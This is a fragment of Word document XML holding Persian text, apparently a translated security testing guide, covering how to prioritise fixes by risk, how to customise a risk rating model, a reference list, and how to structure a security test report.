        <w:t>HIGH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است. با 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حال، توجه داشته باش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که تاث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در واقع </w:t>
      </w:r>
      <w:r w:rsidRPr="0066288E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>LOW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است، بنابرا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>مهلک بودن</w:t>
      </w:r>
      <w:r w:rsidR="001D73BB"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>کل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بهترین حالش </w:t>
      </w:r>
      <w:r w:rsidR="001D73BB" w:rsidRPr="0066288E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>LOW</w:t>
      </w:r>
      <w:r w:rsidR="001D73BB"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>میتواند باشد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. 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>به هم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دل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ل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درک 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زمینه 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آس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پذ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که شما ارز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برای اینکه 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>تصم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مات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ر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مناسب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بگ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بس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="009B34B8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حیاتی</w:t>
      </w:r>
      <w:r w:rsid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است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>. عدم درک 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زم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تواند منجر به عدم اعتماد ب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و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ت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امن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9B34B8" w:rsidRPr="0066288E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>شود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که در بس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از سازمان ها حضور دارند.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F985CDD" w14:textId="77777777" w:rsidR="00D72188" w:rsidRDefault="00D72188" w:rsidP="009B34B8">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="732F646C" w14:textId="77777777" w:rsidR="009B34B8" w:rsidRDefault="00D72188" w:rsidP="00D72188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D72188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قدم 5 :</w:t>
      </w:r>
      <w:r w:rsidR="009355EA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 تص</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72188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میم برای اینکه چه چیزی را درست کنید</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C70C7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9355EA">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>پس از ا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نکه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خطرات را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در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برنامه خود طبقه بند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کرد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شما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ل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ست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اولویت بندی شده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از آنچه که با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انجام ده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خواهید داشت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. به عنوان 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قاعده کل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ابتدا با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مهلک ترین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خطرات را حل کن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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>.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وقتی که شما خطرات با اهمیت کمتر را حل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کنید، هیچ کمکی در </w:t>
      </w:r>
      <w:r w:rsidR="00DE01AB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>رفع خطر کلی نمی کنید، حتی اگر حل کردن آن خطرات ساده یا آسان باش</w:t>
      </w:r>
      <w:r w:rsidR="004A71CF">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ن</w:t>
      </w:r>
      <w:r w:rsidR="00DE01AB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>د.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF71B6" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="004A71CF" w:rsidP="00CB3DC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به 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داشته باش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همه خطرات ارزش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حل کردن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ن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دارند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و برخ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از ضررها نه تنها انتظار م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رود بلکه بر اساس هز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حل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مشکل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قابل توج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است. به عنوان مثال، اگر 100</w:t>
      </w:r>
      <w:r w:rsidR="00CB3DC1">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="Times New Roman" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>٬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000 دلار</w:t>
      </w:r>
      <w:r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هز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شود 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برا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اجرا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کردن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کنترل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که باعث جلوگیری از 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2</w:t>
      </w:r>
      <w:r w:rsidR="00CB3DC1">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="Times New Roman" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>٬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000 دلار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تقلب سالانه</w:t>
      </w:r>
      <w:r w:rsidR="00CB3DC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میشود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،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زمان ۵۰ سال سرمایه گذاری میبرد تا آن ضرر جبران شود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. اما به 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داشته باش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که ممکن است آس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شهرت از تقلب وجود داشته باشد که م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تواند به سازمان ب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شتر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ضرر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بزند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14:paraId="2FEA30DB" w14:textId="77777777" w:rsidR="00CB3DC1" w:rsidRDefault="00CB3DC1" w:rsidP="00CB3DC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4660FDF3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11FB3C8E" w14:textId="77777777" w:rsidR="00EC791A" w:rsidRPr="00EC791A" w:rsidRDefault="00EC791A" w:rsidP="00082C81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lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC791A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">قدم 6 : سفارشی کردن مدل ارزیابی </w:t>
      </w:r>
      <w:r w:rsidR="00082C81" w:rsidRPr="00082C81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خطر </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC791A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خودتان</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4ECEED" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00EC791A" w:rsidP="00082C8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داشتن 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فریمورک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رتبه بند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خطر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که قابل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یت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سفارشی شدن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را داشته باشد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اتخاذ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ح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است. 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مدل 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شخصی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به احتمال ز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نتا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ج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ی که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تول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کند مطابق با درک افراد درباره خطر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ات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جد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است. شما م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زمان ز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را صرف بحث در مورد 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رتبه بندی خطرات تلف کنید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اگر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مدل مانند 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پشت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بان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نم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>. راه ها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مختلف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082C8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شخصی کردن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مدل برا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سازمان</w:t>
      </w:r>
      <w:r w:rsidR="00082C8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تان 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>وجود دارد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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606554E7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2A771708" w14:textId="77777777" w:rsidR="009355EA" w:rsidRPr="00082C81" w:rsidRDefault="00082C81" w:rsidP="009355EA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082C81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افزودن عوامل</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BB6413" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00082C81" w:rsidP="0056713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082C81">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>شما م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عوامل مختلف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را انتخاب کن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567131">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تا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بهتر نشان ده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چه </w:t>
      </w:r>
      <w:r w:rsidR="0056713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چیزی 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>برا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سازمان</w:t>
      </w:r>
      <w:r w:rsidR="00567131">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تان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مهم است. به عنوان مثال، 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برنامه نظام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ممکن است عوامل تاث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رگذار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در از دست دادن زندگ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انسان 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اطلاعات طبقه بند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شده را اضافه کند. شما همچن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ممکن است عوامل احتمال، مانند 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پنجره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فرصت برا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مهاجم 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قدرت الگور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تم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رمزنگار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567131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اضافه کن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14:paraId="70FB0265" w14:textId="77777777" w:rsidR="00567131" w:rsidRDefault="00567131" w:rsidP="0056713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897C032" w14:textId="77777777" w:rsidR="00567131" w:rsidRPr="00567131" w:rsidRDefault="00567131" w:rsidP="00567131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567131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گز</w:t>
      </w:r>
      <w:r w:rsidRPr="00567131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نه</w:t>
      </w:r>
      <w:r w:rsidRPr="00567131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سفارش</w:t>
      </w:r>
      <w:r w:rsidRPr="00567131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14:paraId="20B52066" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00567131" w:rsidP="00712D59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567131">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>گز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نمونه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مربوط به هر عامل وجود دار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د، اما مدل بس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موثر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تر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خواهد بود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>اگر ا</w:t>
      </w:r>
      <w:r w:rsidR="00D0769D"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D0769D"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گز</w:t>
      </w:r>
      <w:r w:rsidR="00D0769D"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D0769D"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="00D0769D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="00121A89"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="00712D59">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>را</w:t>
      </w:r>
      <w:r w:rsidR="00D0769D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در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کارتان سفارش</w:t>
      </w:r>
      <w:r w:rsidR="00D0769D"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="00D0769D"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D0769D"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 برا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مثال، از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اسم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مختلف و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اسم های خودتان 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برا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دسته بند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مختلف اطلاعات استفاده کن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 شما همچن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رتبه های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مربوط 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به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گز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را تغ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ده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 بهتر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روش برا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شناسا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رتبه های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درست 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رتبه بند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تول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شده توسط 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مدل را با رتبه بند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متخصصان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مقا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سه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 شما م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مدل را با</w:t>
      </w:r>
      <w:r w:rsidR="00712D5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به دقت عوض کردن نمرات تنظیم کنید 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14:paraId="5FA8A18D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34A7669" w14:textId="77777777" w:rsidR="009355EA" w:rsidRPr="00712D59" w:rsidRDefault="00712D59" w:rsidP="009355EA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712D59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فاکتورها</w:t>
      </w:r>
      <w:r w:rsidRPr="00712D59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712D59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وزن</w:t>
      </w:r>
      <w:r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14:paraId="3AAD9255" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="006A2DDC" w:rsidP="007D345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6A2DDC">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>مدل فوق فرض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کند که همه عوامل به اندازه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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>هم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مهم هستند. شما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عوامل را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تأک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بر عوامل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که ب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شتر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شما مهم است، وزن کن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>. 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باعث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شود که مدل کم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پ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تر شود، ز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را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شما با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از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انگ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وزن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استفاده کن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>. اما در غ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صورت هم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ز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شبیه قبل کار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کند. </w:t>
      </w:r>
      <w:r w:rsidR="007D3451">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>بازهم، شما میتوانید مدل را با جور کردنش با رتبه بندی خطایی که قبول دارید درست است، تنظیم کنید.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD387D8" w14:textId="77777777" w:rsidR="00B42118" w:rsidRPr="00B42118" w:rsidRDefault="00B42118" w:rsidP="00B42118">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B42118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lastRenderedPageBreak/>
        <w:t>منابع</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F2F73" w14:textId="77777777" w:rsidR="00B42118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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B42118">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NIST 800-30 Risk Management Guide for Infor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mation Technology Systems [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9C41A5" w14:textId="77777777" w:rsidR="00B42118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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B42118">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/NZS 4360 Risk Management [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F1BE0" w14:textId="77777777" w:rsidR="00B42118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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B42118">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Industry standard vulnerability severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and risk rankings (CVSS) [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D3E68" w14:textId="77777777" w:rsidR="009355EA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  <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B42118">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security-enhancing process models (CLASP) [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC01A7D" w14:textId="77777777"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Microsoft Web Application Security Frame [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4E6E1" w14:textId="77777777"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Security In The Software Lifecycle from DHS [6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA2BC9" w14:textId="77777777"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Threat Risk Modeling [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CECD5C" w14:textId="77777777" w:rsidR="00B42118" w:rsidRPr="00B42118" w:rsidRDefault="003D0575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Practical</w:t>
      </w:r>
      <w:r w:rsidR="00B42118" w:rsidRPr="00B42118">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Threat Analysis [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A90855" w14:textId="77777777"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A Platform for Risk Analysis of Security Critical Systems [9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B16A69" w14:textId="77777777"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Model-driven Development and Analysis of Secure Information Systems [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364C2D90" w14:textId="77777777" w:rsidR="009355EA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Value Driven Security Threat Modeling Based on Attack Path Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00B42118">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237CCAFA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05838E40" w14:textId="77777777" w:rsidR="009355EA" w:rsidRPr="003D0575" w:rsidRDefault="003D0575" w:rsidP="009355EA">
      <w:pPr>
        <w:bidi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۵.۲ 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چطور گزارش تست را بنویسیم</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F4CDEC" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="003D0575" w:rsidP="003D05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D0575">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>اجرا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تنها ن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از روند ارز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است؛ محصول نها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تول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گزارش خوب و آموزنده است.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C91B4" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="003D0575" w:rsidP="00A5698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D0575">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>گزارش با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>درک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ش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آسان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باشد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و تمام خطرات موجود در مرحله ارز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را </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>برجسته ک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ند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و درخواست تجد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نظر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فوری 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به کارکنان مد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و فن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A5698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بدهد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14:paraId="3FBE7E5B" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="00A5698D" w:rsidP="00B42118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A5698D">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>گزارش با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دارا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سه قسمت اصل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باشد و به نحو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جاد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شود که اجازه </w:t>
      </w:r>
      <w:r w:rsidR="0067622E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">دهد هر قسمت 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از هم جدا و چاپ و به ت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مناسب مانند توسعه دهندگان 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مد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ران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س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داده شود.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A024C58" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="0067622E" w:rsidP="00B42118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67622E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>بخش ها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که به طور کل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توص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شود عبارتند از:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153772EF" w14:textId="77777777" w:rsidR="00B42118" w:rsidRPr="004B5E0E" w:rsidRDefault="0067622E" w:rsidP="0067622E">
      <w:pPr>
        <w:bidi/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</w:pPr>
      <w:r w:rsidRPr="0067622E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="004B5E0E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. خلاصه</w:t>
      </w:r>
      <w:r w:rsidRPr="004B5E0E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B5E0E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</w:t>
      </w:r>
      <w:r w:rsidRPr="004B5E0E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اجرایی</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B40FFB0" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="0067622E" w:rsidP="004B5E0E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67622E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>خلاصه اجرائ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85680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افته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را</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"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خلاصه </w:t>
      </w:r>
      <w:r w:rsidR="000B35EE">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>می کند و</w:t>
      </w:r>
      <w:r w:rsidR="001C092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0B35EE">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>به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مد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ران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صاحبان س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0B35E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این ایده را </w:t>
      </w:r>
      <w:r w:rsidR="00856802" w:rsidRPr="0067622E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>م</w:t>
      </w:r>
      <w:r w:rsidR="00856802"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856802"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دهد</w:t>
      </w:r>
      <w:r w:rsidR="000B35E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که</w:t>
      </w:r>
      <w:r w:rsidR="0085680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با چه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خطر کل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856802">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> روبرو </w:t>
      </w:r>
      <w:r w:rsidR="00856802">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>هستند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. زبان مورد استفاده با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ب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شتر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مناسب افراد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باشد که از لحاظ فن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آگاه ن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ستند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و با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نمودار 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856802">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>جداول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د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گر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را نشان دهند که سطح خطر را نشان م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د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هد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. توص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شود که خلاصه </w:t>
      </w:r>
      <w:r w:rsidR="004B5E0E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>وجود داشته باشد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، </w:t>
      </w:r>
      <w:r w:rsidR="004B5E0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وقی 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که جزئ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در هنگام تست آغاز م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شود و </w:t>
      </w:r>
      <w:r w:rsidR="004B5E0E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>وقتی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که </w:t>
      </w:r>
      <w:r w:rsidR="004B5E0E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تمام می شود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14:paraId="579DB3A4" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="004B5E0E" w:rsidP="004B5E0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B5E0E">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>بخش د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گر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که اغلب ناد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گرفته م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شود، پاراگراف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در مورد پ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امدها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و اقدامات است. ا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به صاحبان س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اجازه م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دهد تا بدانند که چه کار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باید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انجام شود تا اطم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نان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حاصل شود که س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امن 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>باق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ماند.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580176F7" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="00B42118" w:rsidP="00B42118">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3DBA25" w14:textId="77777777" w:rsidR="00B42118" w:rsidRPr="001C0920" w:rsidRDefault="001C0920" w:rsidP="001C0920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1C0920">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>II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.</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0920">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> 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بررس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اجمال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مد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ر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ت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فن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14:paraId="1A1B042C" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="001C0920" w:rsidP="001732B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1C0920">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>بخش بررس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اجمال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مد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اغلب به مد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ران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دارد که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آنها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به جزئ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شتر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از آنچه در خلاصه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اجرایی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پ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دا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می شود دارند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>. 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بخش با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شامل جزئ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مربوط به دامنه ارز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اهداف و موارد </w:t>
      </w:r>
      <w:r w:rsidR="001732B1">
        <w:rPr>
